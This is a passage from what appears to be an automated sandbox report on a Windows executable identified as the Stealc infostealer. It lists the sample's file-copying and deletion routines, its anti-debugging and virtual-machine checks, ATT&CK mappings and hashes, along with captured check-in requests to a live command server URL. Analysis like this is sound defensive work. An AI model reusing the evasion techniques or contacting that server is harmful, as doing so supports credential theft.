                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B04910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00AFDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00AFE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00AFED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B04570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B03EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AFF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AF16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00AFDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00AFBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF1160 GetSystemInfo,ExitProcess,0_2_00AF1160
                Source: file.exe, file.exe, 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2182986141.0000000001915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2182986141.00000000018D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13401
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13398
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13420
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13413
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13453
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF45C0 VirtualProtect ?,00000004,00000100,000000000_2_00AF45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B09860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B09750 mov eax, dword ptr fs:[00000030h]0_2_00B09750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B078E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00B078E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3884, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B09600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00B09600
                Source: file.exeBinary or memory string: [Program Manager
                Source: file.exe, 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: [Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00B07B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B07980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00B07980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B07850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00B07850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B07A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00B07A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3884, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2140370390.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 3884, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe47%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpqMfile.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php%Mfile.exe, 00000000.00000002.2182986141.0000000001902000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37Gfile.exe, 00000000.00000002.2182986141.000000000188E000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/lfile.exe, 00000000.00000002.2182986141.00000000018E9000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1541095
                        Start date and time:2024-10-24 12:10:11 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 2s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 85
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousLummaC, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                        • 185.215.113.16
                        msqT9atzYW.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.43
                        file.exeGet hashmaliciousLummaC, StealcBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.16

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.948302954318922
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'820'160 bytes
                        MD5:3232476789303ec2731e9ccce8937fea
                        SHA1:9d2054302efc53083547e139d7f8a7487e909c89
                        SHA256:8e46ac374c025d82eb6c7c0db64706ce2546735b1dc5758087fb6fbe9041af84
                        SHA512:83e093988daf1649ec994a1f07557e9fabd9a8fed52647379102414ba8b5be5584135db559149516f06f40662272c55cf0014f04dcf8dca04b1857a8232d52e4
                        SSDEEP:24576:7uHFgUEdKlxkd4YCi5TrXwP7slXyC1qf7r4cPIeYa3xolQBqXk/cBmIi8Q8:SHCUEY4HwP7SXr1qfX4KBCQBqK+i8N
                        TLSH:7D8533EC813E17EDE89E8E7E1889D04E30FF71448F465EFEB899153DA11B60A6248F54
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0xa8a000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007FC220B9E93Ah
                        shld dword ptr [ebx], ebx, 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007FC220BA0935h
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+00000000h], cl
                        add byte ptr [eax], al
                        add byte ptr [edx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, byte ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x22800a93ecb71b529076d3a6a95e427a13263unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x25e0000x2940000x20032cc314bc2a1634160c80c87ae81ad14unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        oxbstytm0x4f20000x1970000x196400f34311c61cbec098d9a7f5b94f0c51f1False0.9948882211538461data7.954384653876487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        yzvcyrux0x6890000x10000x400da4a51ff8bcb97cde192d83a229bab4fFalse0.7099609375data5.793995449541384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x68a0000x30000x22004fbc2db30dae5ee5286d1443da79c90cFalse0.06353400735294118DOS executable (COM)0.80571294913891IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-24T12:11:08.098877+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649711185.215.113.3780TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 24, 2024 12:11:06.873512983 CEST4971180192.168.2.6185.215.113.37
                        Oct 24, 2024 12:11:06.878959894 CEST8049711185.215.113.37192.168.2.6
                        Oct 24, 2024 12:11:06.879066944 CEST4971180192.168.2.6185.215.113.37
                        Oct 24, 2024 12:11:06.879647017 CEST4971180192.168.2.6185.215.113.37
                        Oct 24, 2024 12:11:06.885874033 CEST8049711185.215.113.37192.168.2.6
                        Oct 24, 2024 12:11:07.776592016 CEST8049711185.215.113.37192.168.2.6
                        Oct 24, 2024 12:11:07.776694059 CEST4971180192.168.2.6185.215.113.37
                        Oct 24, 2024 12:11:07.809176922 CEST4971180192.168.2.6185.215.113.37
                        Oct 24, 2024 12:11:07.814810991 CEST8049711185.215.113.37192.168.2.6
                        Oct 24, 2024 12:11:08.095180988 CEST8049711185.215.113.37192.168.2.6
                        Oct 24, 2024 12:11:08.098876953 CEST4971180192.168.2.6185.215.113.37
                        Oct 24, 2024 12:11:10.378079891 CEST4971180192.168.2.6185.215.113.37

                        HTTP Request Dependency Graph

                        • 185.215.113.37

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.649711185.215.113.37803884C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Oct 24, 2024 12:11:06.879647017 CEST89OUTGET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 24, 2024 12:11:07.776592016 CEST203INHTTP/1.1 200 OK
                        Date: Thu, 24 Oct 2024 10:11:07 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 24, 2024 12:11:07.809176922 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHC
                        Host: 185.215.113.37
                        Content-Length: 210
                        Connection: Keep-Alive
                        Cache-Control: no-cache
